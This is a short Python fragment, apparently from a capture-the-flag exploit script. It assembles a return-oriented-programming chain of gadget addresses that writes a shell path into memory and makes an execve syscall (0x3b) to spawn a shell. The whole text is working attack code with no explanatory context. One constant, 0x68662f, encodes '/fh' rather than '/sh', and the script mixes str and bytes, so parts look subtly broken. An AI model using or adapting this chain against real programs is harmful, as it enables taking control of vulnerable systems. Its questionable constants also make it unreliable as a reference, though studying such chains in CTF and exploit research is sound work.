payload = p64(0x420125)
#0x420125: pop rdi ; retf
payload += p64(0x474058)+p32(0x40e8d0)+p32(0x33)
# 0x000000000040e8d0: pop rax; ret 2; 
payload += p64(0x6e69622f)+p64(0x4274c1)+"\x00"*2
# 0x00000000004274c1: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x420125)
# 0x420125: pop rdi ; retf
payload += p64(0x47405c)+p32(0x40e8d0)+p32(0x33)
# 0x000000000040e8d0: pop rax; ret 2; 
payload += p64(0x68662f)+p64(0x4274c1)+"\x00"*2
# 0x00000000004274c1: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x420125)
# 0x420125: pop rdi ; retf
payload += p64(0x474058)+p32(0x40e8d0)+p32(0x33)
# 0x000000000040e8d0: pop rax; ret 2; 
payload += p64(0x3b)+p64(0x43262e)+"\x00"*2
# 0x000000000043262e: pop rsi; ret 3; 
payload += p64(0x0)+p64(0x45e6ea)+"\x00"*3
# 0x000000000045e6ea: pop rdx; ret 0; 
payload += p64(0x0)+p64(0x413585)
# 0x0000000000413585: syscall; 
payload += b''
